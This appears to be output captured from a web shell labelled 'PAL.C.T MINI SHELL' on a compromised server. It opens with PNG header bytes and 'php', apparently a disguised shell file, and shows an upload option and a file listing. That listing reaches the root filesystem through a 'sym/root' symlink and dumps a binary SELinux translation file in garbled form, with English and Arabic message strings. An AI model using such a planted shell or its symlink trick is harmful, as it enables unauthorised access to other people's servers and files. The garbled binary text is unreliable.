php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/usr/share/locale/ar/LC_MESSAGES/
upload
files >> /var/www/html/sub/images/sym/root/usr/share/locale/ar/LC_MESSAGES/policycoreutils.mo

,<*h8i8}8888?8;9&O99v99997:?:C:L:`:s::::::::::;+;<;U;/^;;;;;G;E<$M<)r<M<5<) =lJ=)==2=L2>K>>">
?(?!G?'i?D?B?@A@@4A&7A,^A%A2AAKB5MBTB<BLC(bC,CPC2	D.<DJkD%D(D4E:E]VECE(E!F$FF%G-=GLkGxG1H(=HfHH2HHHH2H#I1<I2nII I"IIJAL
L
MMP&MwMM!MM"MN$NCN-`N%N(N1N*O2:O(mOO%O$OO P>P[P"{P$P!PP%Q'Q GQ hQQQ$QQ%R'R$CRhR$R'RRRS+S@SXSuS"SSS S T'T @TaTzT$TT%TTU3UKU#kUUUUU5V7VVV!uV(V!V"V!W&'WNW$hW/W/W4W2"XUX?oX$X)X)X.(Y,WY)Y)Y.Y,Z)4Z)^Z.Z,Z$Z!	[+[)G[q[v[
[[	[	[[[[\\
\-)\(W\)\2\2\-]*>]*i]%]%]*].^,:^/g^$^/^+^-_+F_+r_'_$_,_-`0F`.w`+`0`4a+8a(da)a+a,a+b#<b%`b#b)b,b+c+-c+Yc-c+c-c-
d.;d(jd-d/d.d$ e)Ee)oe.e-e*e*!f/Lf-|f*f.f2g+7g*cg.g*g0g+h-Eh-sh+h-h,h+(i,Ti)i*i)i&j+'j,Sj*j,j,j+k-1k*_k*k*k*k)l*5l%`l/l-l)l&m/5m-em/m&m0m#n-?n-mn*n)n%n+o-Bo+po$o(o*o*p$@p0ep-p*p#p+q/?q3oq.q&q4q+.r.Zr*r+r+r+s,8s+es/s+s)s-t*Et*pt-t/t)t,#u+Pu/|u0u*u)v.2v-av+v,v.v-w)Ew*ow)w)w,w,xHxQx1px:x9xNyfyxyWy	y2yJz<ezz zz"z+{&K{r{+{#{{!{%|<|X|!u| | |F|
 }+}
?}M}k}	~}}
}}	};}"~%~,~0~6~
Q~
\~j~v~4~~~ ~6Jenw	

<#X	|	

Āր	
+G%SGýӁׁہ'@Ym	

ʂς27C8T8ƃ̓փ!9Wv&Ƅ"(HMbЅ
!<Ibo:7ˆ"@DJcp,FJ&:'<GH($ˊ05O6̋ҋqY`~|,*׍'.*3Y42Ž4E*p'*)R|",	'<Xq}*ܑ'"'Jr]
	rUv̓	.$*S~L%C4_<ѕ0!-_1,4֖#,/(\("ė9PlǘϘטߘ"*#G7k$ڙ#"F6 S t hȜh1<Xם20\c4/+Lx

ğ8ҟ *$K&p(G!@b$oww9?â]F8S/nSzm:!+*M=x<Ji>czԩ2ODMǪ=CSJ.eN=sNJT5?C\ACzp?+?;H{9ĴIzHõ^7m#ɶZ߶2:"mM9Wdt3ٸ1
1?*q0.ͼ
q!0*ľ0* 6K+2*PJ][TLY[K+N,z5+.	/8)h,4++ 6L,,,&
510g&4'+$H0m-/26/0f;;0J@;.>;5.q0*946*k6+#.3L8./+5DVz+'1%BW4,,2)%\1D@D:E#[5E@{<@A:@|<@A;F}BFGN(2AA4v({	$CW^7x++55>1t-)--,4Z869,9@f51--=*k'.)20J-{-=-&C+j-.-&!(H&q,.--"-P/~-//0<1m/1002+c+0/,-I2w0-1	;;.w-1-34.h00/0).Z./,-,C*p./-/(/X.0---D-r,-)3%0Y,*202F*y3'001-b,).0.G(v,.-()4R0-'.2=6p1*7.<1k-...)/X.2.,0F-w-08,=/j.>3-<,j10./)1Y0,,,,C/p/
#OWOH_ Pq_yxp'c@66D:A3C;92u;A!&0H1y--nv,
1'F\vQ+)"Lfw-K#2,HQu 
.,+X"p"
'U/u
<*S
~(Ft3
*"I)l -E&NHu$FrV

(@:[W0,FL'%Vi)p3		*&	Q	i						!	
[!
R}
'
$
!$'L"dSc:?
\z

<zZcv)2""&3CZPQ-AouN3[27K:.?iYOGSOlXu@]<+XM`306+&b(#,2?O)6VGg(@4
 A >M =   !!!;!0!c"g|"'"9#F#N#Z#v_##Z#4N$#$4$8$B%,X%<%3%-%$&@&&\&&&&&(&&''''#'+'3';'-C'%q'2']'((
B(M(R(/X((((((5(Nk	je~a!l@1CIc&jh'2,;<B(0F]4po%=vs(9/l{y%bC1iCX:$%|ffTHK@7IQ
GH
)s)W&3m.DI]T"vAh5 66F
a
k80uu|RY'*$4zOe !mG8beZq^wS!|YZ
sJzKi5kO(-
Gw*.VUE>;JczV-}=E\PY-+{P1$p<dX,Rg2t[rqU`g<@j^QwS_J+}yFxqyD	B ?xr0i~n_MaK.Tl~v>Sn:UfA+rNn3B_[9)`"dERW]LO5g8?pt\*`bhH>c3N[xu?}6#DM2ZQPo#M#Ad'4o/=/^7\	W,":LtVX;m&L{79%s changed labels.
%s is already in %s%s is not a valid context
%s is not in %s%s must be a directory%s!  Could not get current context for %s, not relabeling tty.
%s!  Could not get new context for %s, not relabeling tty.
%s!  Could not set new context for %s
%s:  Can't load policy and enforcing mode requested:  %s
%s:  Can't load policy:  %s
%s:  Policy is already loaded and initial load requested
******************** IMPORTANT ***********************
...600-1024<b>Applications</b><b>Login Users</b><b>Root Users</b><b>Select:</b><b>TCP Ports</b><b>UDP Ports</b>AddAdd %sAdd Booleans DialogAdd File ContextAdd Network PortAdd SELinux Login MappingAdd SELinux Network PortsAdd SELinux UserAdd SELinux User MappingAdd UserAddr %s is defined in policy, cannot be deletedAddr %s is not definedAdminAdmin User RoleAllAllow SELinux webadm user to manage unprivileged users home directoriesAllow SELinux webadm user to read unprivileged users home directoriesAllow Samba to share nfs directoriesAllow Spam Assassin daemon network accessAllow X-Windows server to map a memory region as both executable and writableAllow all daemons the ability to use unallocated ttysAllow all daemons to write corefiles to /Allow cdrecord to read various content. nfs, samba, removable devices, user temp and untrusted content filesAllow clients to write to X shared memoryAllow daemons to run with NISAllow evolution and thunderbird to read user filesAllow gadmin SELinux user account to execute files in home directory or /tmpAllow guest SELinux user account to execute files in home directory or /tmpAllow java executable stackAllow mount to mount any directoryAllow mount to mount any fileAllow mplayer executable stackAllow normal user to execute pingAllow pppd to be run for a regular userAllow privileged utilities like hotplug and insmod to run unconfinedAllow programs to read files in non-standard locations (default_t)Allow rc scripts to run unconfined, including any daemon started by an rc script that does not have a domain transition explicitly definedAllow regular users direct mouse access (only allow the X server)Allow rpm to run unconfinedAllow sasl authentication server to read /etc/shadowAllow spamd to access home directoriesAllow squid daemon to connect to the networkAllow ssh logins as sysadm_r:sysadm_tAllow ssh to run from inetd instead of as a daemonAllow ssh to run ssh-keysignAllow staff SELinux user account to execute files in home directory or /tmpAllow staff Web Browsers to write to home directoriesAllow staff_r users to search the sysadm home dir and read files (such as ~/.bashrc)Allow stunnel daemon to run as standalone, outside of xinetdAllow sysadm SELinux user account to execute files in home directory or /tmpAllow sysadm_t to directly start daemonsAllow the mozilla browser to read user filesAllow unconfined SELinux user account to execute files in home directory or /tmpAllow unconfined to dyntrans to unconfined_execmemAllow unlabeled packets to flow on the networkAllow user SELinux user account to execute files in home directory or /tmpAllow user to connect to mysql socketAllow user to connect to postgres socketAllow user to r/w noextattrfile (FAT, CDROM, FLOPPY)Allow user to stat ttyfilesAllow user_r to reach sysadm_r via su, sudo, or userhelper. Otherwise, only staff_r can do soAllow users to control network interfaces (also needs USERCTL=true)Allow users to execute the mount commandAllow users to run TCP servers (bind to ports and accept connection from the same domain and outside users)  disabling this forces FTP passive mode and may change other protocolsAllow users to run the dmesg commandAllow users to rw usb devicesAllow xdm logins as sysadm_r:sysadm_tAllow xen to read/write physical disk devicesAllow xguest SELinux user account to execute files in home directory or /tmpAllow xinetd to run unconfined, including any services it starts that do not have a domain transition explicitly definedApplicationAre you sure you want to delete %s '%s'?Bad format %s: Record %sBooleanBoolean %s is defined in policy, cannot be deletedBoolean %s is not definedBoolean NameCVSCan not combine +/- with other types of categoriesCan not have multiple sensitivitiesCan not modify sensitivity levels using '+' on %sCannot find your entry in the shadow passwd file.
Cannot read policy store.Change process mode to enforcingChange process mode to permissive.Changing the policy type will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?Changing to SELinux disabled requires a reboot.  It is not recommended.  If you later decide to turn SELinux back on, the system will be required to relabel.  If you just want to see if SELinux is causing a problem on your system, you can go to permissive mode which will only log errors and not enforce SELinux policy.  Permissive mode does not require a reboot    Do you wish to continue?Changing to SELinux enabled will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?CompatibilityConfigue SELinuxContextCopyright (c)2006 Red Hat, Inc.
Copyright (c) 2006 Dan Walsh <dwalsh@redhat.com>Could not add SELinux user %sCould not add addr %sCould not add file context for %sCould not add interface %sCould not add login mapping for %sCould not add port %s/%sCould not add prefix %s for %sCould not add role %s for %sCould not check if SELinux user %s is definedCould not check if addr %s is definedCould not check if boolean %s is definedCould not check if file context for %s is definedCould not check if interface %s is definedCould not check if login mapping for %s is definedCould not check if port %s/%s is definedCould not close descriptors.
Could not commit semanage transactionCould not create SELinux user for %sCould not create a key for %sCould not create a key for %s/%sCould not create addr for %sCould not create context for %sCould not create context for %s/%sCould not create file context for %sCould not create interface for %sCould not create key for %sCould not create login mapping for %sCould not create port for %s/%sCould not create semanage handleCould not delete SELinux user %sCould not delete addr %sCould not delete boolean %sCould not delete file context for %sCould not delete interface %sCould not delete login mapping for %sCould not delete port %s/%sCould not delete the file context %sCould not delete the port %sCould not determine enforcing mode.
Could not establish semanage connectionCould not extract key for %sCould not list SELinux modulesCould not list SELinux usersCould not list addrsCould not list booleansCould not list file contextsCould not list interfacesCould not list local file contextsCould not list login mappingsCould not list portsCould not list roles for user %sCould not list the file contextsCould not list the portsCould not modify SELinux user %sCould not modify addr %sCould not modify boolean %sCould not modify file context for %sCould not modify interface %sCould not modify login mapping for %sCould not modify port %s/%sCould not open file %s
Could not query addr %sCould not query file context %sCould not query file context for %sCould not query interface %sCould not query port %s/%sCould not query seuser for %sCould not query user for %sCould not remove permissive domain %s (remove failed)Could not set MLS level for %sCould not set MLS range for %sCould not set SELinux user for %sCould not set active value of boolean %sCould not set addr context for %sCould not set exec context to %s.
Could not set file context for %sCould not set interface context for %sCould not set mask for %sCould not set message context for %sCould not set mls fields in addr context for %sCould not set mls fields in file context for %sCould not set mls fields in interface context for %sCould not set mls fields in port context for %s/%sCould not set name for %sCould not set permissive domain %s (module installation failed)Could not set port context for %s/%sCould not set role in addr context for %sCould not set role in file context for %sCould not set role in interface context for %sCould not set role in port context for %s/%sCould not set type in addr context for %sCould not set type in file context for %sCould not set type in interface context for %sCould not set type in port context for %s/%sCould not set user in addr context for %sCould not set user in file context for %sCould not set user in interface context for %sCould not set user in port context for %s/%sCould not start semanage transactionCould not test MLS enabled statusCouldn't get default type.
Create/Manipulate temporary files in /tmpCronCurrent Enforcing ModeCustomizedDBUS System DaemonDatabasesDelete %sDelete File ContextDelete Network PortDelete SELinux User MappingDelete UserDescriptionDisable AuditDisable SELinux protection for Cluster ServerDisable SELinux protection for EvolutionDisable SELinux protection for Hal daemonDisable SELinux protection for NIS Password DaemonDisable SELinux protection for NIS Transfer DaemonDisable SELinux protection for NetworkManagerDisable SELinux protection for ThunderbirdDisable SELinux protection for acct daemonDisable SELinux protection for amandaDisable SELinux protection for amavisDisable SELinux protection for apmd daemonDisable SELinux protection for arpwatch daemonDisable SELinux protection for auditd daemonDisable SELinux protection for automount daemonDisable SELinux protection for avahiDisable SELinux protection for bluetooth daemonDisable SELinux protection for canna daemonDisable SELinux protection for cardmgr daemonDisable SELinux protection for ciped daemonDisable SELinux protection for clamd daemonDisable SELinux protection for clamscanDisable SELinux protection for clvmdDisable SELinux protection for comsat daemonDisable SELinux protection for courier daemonDisable SELinux protection for cpucontrol daemonDisable SELinux protection for cpuspeed daemonDisable SELinux protection for crond daemonDisable SELinux protection for cups hplip daemonDisable SELinux protection for cupsd back end serverDisable SELinux protection for cupsd daemonDisable SELinux protection for cupsd_lpdDisable SELinux protection for cvs daemonDisable SELinux protection for cyrus daemonDisable SELinux protection for dbskkd daemonDisable SELinux protection for dbusd daemonDisable SELinux protection for dccdDisable SELinux protection for dccifdDisable SELinux protection for dccmDisable SELinux protection for ddt daemonDisable SELinux protection for devfsd daemonDisable SELinux protection for dhcpc daemonDisable SELinux protection for dhcpd daemonDisable SELinux protection for dictd daemonDisable SELinux protection for distccd daemonDisable SELinux protection for dmesg daemonDisable SELinux protection for dnsmasq daemonDisable SELinux protection for dovecot daemonDisable SELinux protection for entropyd daemonDisable SELinux protection for fetchmailDisable SELinux protection for fingerd daemonDisable SELinux protection for freshclam daemonDisable SELinux protection for fsdaemon daemonDisable SELinux protection for gamesDisable SELinux protection for gpm daemonDisable SELinux protection for gss daemonDisable SELinux protection for hostname daemonDisable SELinux protection for hotplug daemonDisable SELinux protection for howl daemonDisable SELinux protection for http suexecDisable SELinux protection for httpd rotatelogsDisable SELinux protection for hwclock daemonDisable SELinux protection for i18n daemonDisable SELinux protection for imazesrv daemonDisable SELinux protection for inetd child daemonsDisable SELinux protection for inetd daemonDisable SELinux protection for innd daemonDisable SELinux protection for iptables daemonDisable SELinux protection for ircd daemonDisable SELinux protection for irqbalance daemonDisable SELinux protection for iscsi daemonDisable SELinux protection for jabberd daemonDisable SELinux protection for kadmind daemonDisable SELinux protection for klogd daemonDisable SELinux protection for krb5kdc daemonDisable SELinux protection for ktalk daemonsDisable SELinux protection for kudzu daemonDisable SELinux protection for locate daemonDisable SELinux protection for lpd daemonDisable SELinux protection for lrrd daemonDisable SELinux protection for lvm daemonDisable SELinux protection for mailmanDisable SELinux protection for mdadm daemonDisable SELinux protection for monopd daemonDisable SELinux protection for mrtg daemonDisable SELinux protection for mysqld daemonDisable SELinux protection for nagios daemonDisable SELinux protection for named daemonDisable SELinux protection for nessusd daemonDisable SELinux protection for nfsd daemonDisable SELinux protection for nmbd daemonDisable SELinux protection for nrpe daemonDisable SELinux protection for nscd daemonDisable SELinux protection for nsd daemonDisable SELinux protection for ntpd daemonDisable SELinux protection for oddjobDisable SELinux protection for oddjob_mkhomedirDisable SELinux protection for openvpn daemonDisable SELinux protection for pam daemonDisable SELinux protection for pegasusDisable SELinux protection for perdition daemonDisable SELinux protection for portmap daemonDisable SELinux protection for portslave daemonDisable SELinux protection for postfixDisable SELinux protection for postgresql daemonDisable SELinux protection for pptpDisable SELinux protection for prelink daemonDisable SELinux protection for privoxy daemonDisable SELinux protection for ptal daemonDisable SELinux protection for pxe daemonDisable SELinux protection for pyzordDisable SELinux protection for quota daemonDisable SELinux protection for radiusd daemonDisable SELinux protection for radvd daemonDisable SELinux protection for rdiscDisable SELinux protection for readaheadDisable SELinux protection for restorecondDisable SELinux protection for rhgb daemonDisable SELinux protection for ricciDisable SELinux protection for ricci_modclusterdDisable SELinux protection for rlogind daemonDisable SELinux protection for rpcd daemonDisable SELinux protection for rshdDisable SELinux protection for rsync daemonDisable SELinux protection for saslauthd daemonDisable SELinux protection for scannerdaemon daemonDisable SELinux protection for sendmail daemonDisable SELinux protection for setransDisable SELinux protection for setroubleshoot daemonDisable SELinux protection for slapd daemonDisable SELinux protection for slrnpull daemonDisable SELinux protection for smbd daemonDisable SELinux protection for snmpd daemonDisable SELinux protection for snort daemonDisable SELinux protection for sound daemonDisable SELinux protection for soundd daemonDisable SELinux protection for spamd daemonDisable SELinux protection for speedmgmt daemonDisable SELinux protection for squid daemonDisable SELinux protection for ssh daemonDisable SELinux protection for stunnel daemonDisable SELinux protection for swat daemonDisable SELinux protection for sxid daemonDisable SELinux protection for syslogd daemonDisable SELinux protection for system cron jobsDisable SELinux protection for tcp daemonDisable SELinux protection for telnet daemonDisable SELinux protection for tftpd daemonDisable SELinux protection for the web browsersDisable SELinux protection for transproxy daemonDisable SELinux protection for udev daemonDisable SELinux protection for uml daemonDisable SELinux protection for updfstab daemonDisable SELinux protection for uptimed daemonDisable SELinux protection for uucpd daemonDisable SELinux protection for vmware daemonDisable SELinux protection for watchdog daemonDisable SELinux protection for winbind daemonDisable SELinux protection for xdm daemonDisable SELinux protection for xen controlDisable SELinux protection for xen daemonDisable SELinux protection for xfs daemonDisable SELinux protection for ypbind daemonDisable SELinux protection for ypserv daemonDisabledDisabled
Permissive
Enforcing
Do not allow any processes to load kernel modulesDo not allow any processes to modify kernel SELinux policyDo not allow transition to sysadm_t, sudo and su effectedDo not audit things that we know to be broken but which are not security risksEdit Network PortEnable AuditEnable/Disable additional audit rules, that are normally not reported in the log files.EnforcingEnter complete path for executable to be confined.Enter complete path to init script used to start the confined application.Enter unique name for the confined application or user role.Error allocating memory.
Error allocating shell's argv0.
Error changing uid, aborting.
Error connecting to audit system.
Error dropping SETUID capability, aborting
Error dropping capabilities, aborting
Error freeing caps
Error initializing capabilities, aborting.
Error resetting KEEPCAPS, aborting
Error sending audit message.
Error setting KEEPCAPS, aborting
Error setting capabilities, aborting
Error!  Could not open %s.
Error!  Shell is not valid.
Error: multiple levels specified
Error: multiple roles specified
Error: multiple types specified
Error: you are not allowed to change levels on a non secure terminal 
ExecutableExisting User RolesExisting_UserFailed to close tty properly
File
SpecificationFile
TypeFile Contexts fileFile LabelingFile SpecificationFile TypeFile context for %s is defined in policy, cannot be deletedFile context for %s is not definedFilterGPLGamesGenerate new policy moduleGroup ViewHTTPD ServiceInit scriptInteracts with the terminalInterface %s is defined in policy, cannot be deletedInterface %s is not definedInterface fileInternet Services Daemon (inetd)Internet Services Daemon are daemons started by xinetdInvalid file specificationKerberosLabelingLinux Group %s does not existLinux User %s does not existList ViewLoad Policy ModuleLoad policy moduleLockdown...Login
NameLogin '%s' is requiredLogin NameLogin mapping for %s is defined in policy, cannot be deletedLogin mapping for %s is not definedMCS LevelMCS RangeMLSMLS/MLS/
MCS RangeMLS/MCS
LevelMLS/MCS RangeMemory ProtectionMinimal Terminal User RoleMinimal X Windows User RoleModify %sModify File ContextModify SELinux User MappingModify UserModify an existing login user record.Module %s.pp already loaded in current policy.
Do you want to continue?Module NameMountNFSNISNameName ServiceNetwork ConfigurationNetwork PortNo context in file %s
Node Address is requiredNode Netmask is requiredNot yet implementedOptions Error %s Out of memory!
Password:PermissivePolgenPolicy DirectoryPolicy ModulePortPort %s/%s already definedPort %s/%s is defined in policy, cannot be deletedPort %s/%s is not definedPort NumberPort is requiredPort number "%s" is not valid.  0 < PORT_NUMBER < 65536 Ports must be numbers or ranges of numbers from 1 to %d PrefixPrintingProcess DomainProtoProtocolProtocol udp or tcp is requiredRed Hat 2007Relabel on next reboot.Remove loadable policy moduleRequires at least one categoryRequires prefix or rolesRequires prefix, roles, level or rangeRequires setypeRequires setype or serangeRequires setype, serange or seuserRequires seuser or serangeRevert boolean setting to system defaultRoleRoot Admin User RoleRun booleans lockdown wizardSASL authentication serverSELinux
UserSELinux AdministrationSELinux InterfaceSELinux Policy Generation ToolSELinux Port
TypeSELinux Port TypeSELinux RolesSELinux Service ProtectionSELinux TypeSELinux Type is requiredSELinux UserSELinux booleanSELinux fcontextSELinux policy is not managed or store cannot be accessed.SELinux user %s is defined in policy, cannot be deletedSELinux user %s is not definedSELinux user '%s' is requiredSSHSambaSelect Management ObjectSelect PortsSelect Root Administrator User Role, if this user will be used to administer the machine while running as root.  This user will not be able to login to the system directly.Select directory to generate policy files inSelect directory(s) that the confined application owns and writes intoSelect executable file to be confined.Select file(s) that confined application creates or writesSelect if you wish to relabel then entire file system on next reboot.  Relabeling can take a very long time, depending on the size of the system.  If you are changing policy types or going from disabled to enforcing, a relabel is required.Select init script file to be confined.Select the domains that you would like this user administer.Select the user roles that will transiton to this applications domains.Selinux
File TypeSemanage transaction already in progressSemanage transaction not in progressSends audit messagesSends emailSetup ScriptSorry, -l may be used with SELinux MLS support.
Sorry, newrole may be used only on a SELinux kernel.
Sorry, run_init may be used only on a SELinux kernel.
Spam ProtectionSquidStandard Init DaemonStandard Init Daemon are daemons started on boot via init scripts.  Usually requires a script in /etc/rc.d/init.dStatusSystem Default Enforcing ModeSystem Default Policy Type: This user can login to a machine via X or terminal.  By default this user will have no setuid, no networking, no sudo, no suThis user will login to a machine only via a terminal or remote login.  By default this user will have  no setuid, no networking, no su, no sudo.To make this policy package active, execute:Toggle between Customized and All BooleansToggle between Customized and All PortsToggle between all and customized file contextTransition staff SELinux user to Web Browser DomainTransition sysadm SELinux user to Web Browser DomainTransition user SELinux user to Web Browser DomainTransition xguest SELinux user to Web Browser DomainType %s_t already defined in current policy.
Do you want to continue?Type Enforcement fileType is requiredUSAGE: run_init <script> <args ...>
  where: <script> is the name of the init script to run,
         <args ...> are the arguments to that script.USER Types automatically get a tmp typeUnable to allocate memory for new_contextUnable to clear environment
Unable to obtain empty signal set
Unable to restore the environment, aborting
Unable to restore tty label...
Unable to set SIGHUP handler
Universal SSL tunnelUnknown or missing protocolUnreserved Ports (>1024)Usage %s -LUsage %s -L -l userUsage %s -d File ...Usage %s -l -d user ...Usage %s -l CATEGORY user ...Usage %s -l [[+|-]CATEGORY],...]q user ...Usage %s CATEGORY File ...Usage %s [[+|-]CATEGORY],...]q File ...Use -- to end option list.  For exampleUser ApplicationUser Application are any application that you would like to confine that is started by a userUser MappingUser PrivsUser RoleUser with full networking, no setuid applications without transition, no su, can sudo to Root Administration RolesUser with full networking, no setuid applications without transition, no sudo, no su.Uses Pam for authenticationUses dbusUses nsswitch or getpw* callsVerify NameVersionWarning!  Could not retrieve tty information.
Warning! Could not restore context for %s
Web Application/Script (CGI)Web ApplicationsWeb Applications/Script (CGI) CGI scripts started by the web server (apache)Writes syslog messages	XENXServerYou must add at least one role for %sYou must enter a executableYou must enter a name for your confined process/userYou must enter the executable path for your confined processYou must select a userYou must specify one of the following values: %s_Delete_Propertiesallall files
regular file
directory
character device
block device
socket
symbolic link
named pipe
authentication failed.
cannot find valid entry in the passwd file.
chcat -- -CompanyConfidential /docs/businessplan.odtchcat -l +CompanyConfidential jusererror on reading PAM service configuration.
failed to build new range with level %s
failed to convert new context to string
failed to exec shell
failed to get account information
failed to get new context.
failed to get old_context.
failed to initialize PAM
failed to set PAM_TTY
failed to set new range %s
failed to set new role %s
failed to set new type %s
getpass cannot open /dev/tty
globallabel37label38label39label41label42label44label50label59newrole:  %s:  error on line %lu.
newrole: failure forking: %snewrole: incorrect password for %s
newrole: service name configuration hashtable overflow
offonpppdrsyncrun_init: incorrect password for %s
system-config-selinuxtranslator-creditstypeunknownusage:  %s [-qi]
use_syslog must be a boolean value Project-Id-Version: 
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2014-10-17 23:48+0000
PO-Revision-Date: 2010-07-14 13:36+0300
Last-Translator: Ali Al-Ammari <ali.a.alammari@gmail.com>
Language-Team: Arabic <trans-ar@lists.fedoraproject.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Language: ar
X-Generator: Lokalize 1.0
Plural-Forms: nplurals=6; plural=n==0 ? 0 : n==1 ? 1 : n==2 ? 2 : n%100>=3 && n%100<=10 ? 3 : n%100>=11 && n%100<=99 ? 4 : 5;
تغيرت عناوين %s.
%s موجود في %s مسبقا%s ليس سياقا صالحا
%s ليس في %s%s يجب أن يكون مجلد%s! لا يمكن الحصول على السياق الحالي لـ %s، لن تعاد عنونة tty.
%s! لا يمكن الحصول على السياق الجديد لـ %s، لن تعاد عنونة tty.
%s! لا يمكن ضبط السياق الجديد لـ %s.
%s:  لا يمكن تحميل السياسة وتم طلب الوضع الملزم:  %s
%s:  لا يمكن تحميل السياسة:  %s
%s: تم تحميل السياسة مسبقاً وتم طلب التحميل المبدئي
******************** مهم ***********************
...600-1024<b>التطبيقات</b><b>تسجيل دخول المستخدمين</b><b>مستخدمو مدير النظام</b><b>اختيار:</b><b>منافذ TCP</b><b>منافذ UDP</b>إضافةإضافة %sإضافة مربع حوار القيم المنطقيةإضافة سياق الملفإضافة منفذ الشبكةإضافة مخطط دخول SELinuxإضافة منافذ شبكة SELinuxإضافة مستخدم SELinuxإضافة مخطط مستخدم SELinuxإضافة مستخدمالعنوان %s معرف في السياسة، لا يمكن حذفهالعنوان %s غير معرفالمشرفدور المستخدم المشرفكلالسماح لمستخدم SELinux webadm لإدارة المجلد الرئيسي لمستخدمين الامتيازالسماح لمستخدم SELinux webadm لقراءة المجلد الرئيسي لمستخدمين الامتيازالسماح لسامبا لمشاركة مجلدات nfsالسماح لخادم Spam Assassin الوصول للشبكةالسماح لخادم X-Windows لعمل توافق بين أجزاء الذاكرة كـ قابلة للتنفيذ والكتابة معاًإعطاء القدرة لجميع الخوادم لاستخدام ttys غير المخصصةالسماح لجميع الخادمات لكتابة corefiles في /السماح cdrecord لقراءة محتوى مختلف .نظام ملف الشبكة و  سامبا و جهاز قابل للإزالة و المستخدم المؤقت و ومحتوى الملفات الغير موثوقةالسماح للعميل بالكتابة على الذاكرة المشتركة Xالسماح للخادم بالعمل مع NISالسماح لـ evolution و thunderbird بقراءة ملفات المستخدمالسماح لحساب مستخدم SELinux gadmin بتنفيذ الملفات في المجلد الرئيسي أو /tmpالسماح لحساب مستخدم SELinux guest (ضيف) بتنفيذ الملفات في المجلد الرئيسي أو /tmpالسماح لكومة java القابلة للتنفيذالسماح بضم أي مجلدالسماح لـ mount بضم أي ملفالسماح لكومة mplayer القابلة للتنفيذالسماح للمستخدم العادي لتنفيذ pingالسماح لـ pppd ليتم تشغيله للمستخدم العاديالسماح للأدوات ذات الامتياز مثل hotplug و insmod للعمل بدون قيودالسماح للبرامج بقراءة ملفات في أماكن غير قياسية (default_t)السماح لبرامج rc النصية للعمل بدون قيود، بما في ذلك أي خادم بدأ ببرنامج rc النصي الذي ليس لديه نطاق انتقال معرّفالسماح للمستخدمين العاديين الوصول المباشر للفأرة (فقط يسمح بخادم X)السماح لـ rpm للعمل بدون قيودالسماح لخادم التوثيق sasl بقراءة /etc/shadowالسماح لـ spamd للوصول إلى المجلدات الرئيسيةالسماح لخادم squid بالاتصال بالشبكةالسماح لـتسجيل الدخول ssh كـ sysadm_r:sysadm_tالسماح لـ ssh ليشتغل من inetd بدلاً منه كخادمالسماح لـ ssh بتشغيل ssh-keysignالسماح لحساب مستخدم SELinux staff (طاقم) بتنفيذ الملفات في المجلد الرئيسي أو /tmpالسماح طاقم متصفحو الأنترنت للكتابة في المجلد الأنترنتالسماح لمستخدمي staff_r بالبحث في المجلدات الرئيسية وقراءة الملفات في sysadm (مثل ~/.bashrc)السماح لخادم stunnel ليشتغل كـ مستقل، خارج xinetdالسماح لحساب مستخدم SELinux sysadm (مدير النظام) بتنفيذ الملفات في المجلد الرئيسي أو /tmpالسماح لـ sysadm_t لبدء الخادم مباشرةالسماح للمستعرض mozilla بقراءة ملفات المستخدمالسماح لحساب مستخدم SELinux unconfined (غير المقيد) بتنفيذ الملفات في المجلد الرئيسي أو /tmpالسماح لغير المقيد بـ dyntrans إلى unconfined_execmemالسماح للحزمة غير المعنونة بالسير داخل الشبكةالسماح لحساب مستخدم SELinux user (مستخدم) بتنفيذ الملفات في المجلد الرئيسي أو /tmpالسماح للمستخدم بالاتصال بمقبس mysqlالسماح للمستخدم بالاتصال بمقبس postgressالسماح للمستخدمين قراءة وكتابة noextattrfile (FAT, CDROM, FLOPPY)السماح للمستخدم بتنفيذ الأمر stat ttyfilesالسماح لـ user_r بالوصول إلى sysadm_r بواسطة su، sudo، أو userhelper. وإلا، فقط staff_r يقوم بذلكالسماح للمستخدمين بتحكم واجهات شبكة الاتصال ( أيضا يحتاج USERCTL=صحيح )السماح للمستخدمين لتنفيذ الأمر mountالسماح للمستخدمين تشغيل خوادم TCP (ربط المنافذ وقبول الاتصال من نفس المجال والمستخدمين الخارجيين) تعطيل هذه يجعل FTP وضع سلبي وقد تتغير بروتوكولات أخرىالسماح للمستخدمين بتنفيذ الأمر dmesgالسماح للمستخدمين قراءة وكتابة أجهزة usbتسمح xdm بتسجيل دخول كـ sysadm_r:sysadm_tتسمح xen لقراءة وكتابة أجهزة القرص الفعليالسماح لحساب الزائر xguest SELinux لتنفيذ الملفات في المجلد الرئيسي أو /tmpالسماح لـ xinetd ليشتغل بدون قيود، بما في ذلك أي خدمات تبدأ وليس لديها نطاق انتقال معرّفالتطبيقهل انت متأكد أنك تريد حذف %s '%s'؟بنية خاطئة %s: سجّل %sقيمة منطقيةالقيمة المنطقية %s معرفة في السياسة، لا يمكن حذفهاالقيمة المنطقية %s غير معرفةاسم القيم المنطقيةCVSلا يمكن الجمع +/- مع أنواع أخرى من التصنيفاتلا يمكن أن يكون متعدد الحساسياتلا يمكن تعديل مستويات الحساسية باستخدام '+' على %sلم يتم العثور على حسابك في ملف كلمات السر المظللة (passwd).
